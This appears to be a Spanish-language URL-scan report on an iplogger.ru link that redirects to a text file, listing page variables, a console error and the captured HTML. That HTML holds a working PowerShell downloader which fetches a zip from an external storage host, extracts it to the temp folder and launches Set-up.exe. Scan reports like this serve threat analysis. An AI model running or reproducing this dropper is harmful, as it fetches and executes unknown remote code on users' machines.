https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/Lejr90.txt

ID de exploración:
4938f04f-5554-483c-8a48-36a4e0c241cbFinalizado
URL enviada:
https://iplogger.ru/250925Redireccionado
Informe finalizado:

Enlaces: 0 encontrados

Variables JavaScript: 3 encontradas

NombreTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

Mensajes de registro de la consola: 1 encontrados

TipoCategoríaRegistrar
errornetwork
URL
https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/favicon.ico
TEXTO
Failed to load resource: the server responded with a status of 404 (Not Found)

HTML

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">$webClient = New-Object System.Net.WebClient
$url1 = "https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/jopi23.zip"
$zipPath1 = "$env:TEMP\pg1.zip"
$webClient.DownloadFile($url1, $zipPath1)
$extractPath1 = "$env:TEMP\file"
Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1
Start-Process -FilePath $env:TEMP\file\Set-up.exe
</pre></body></html>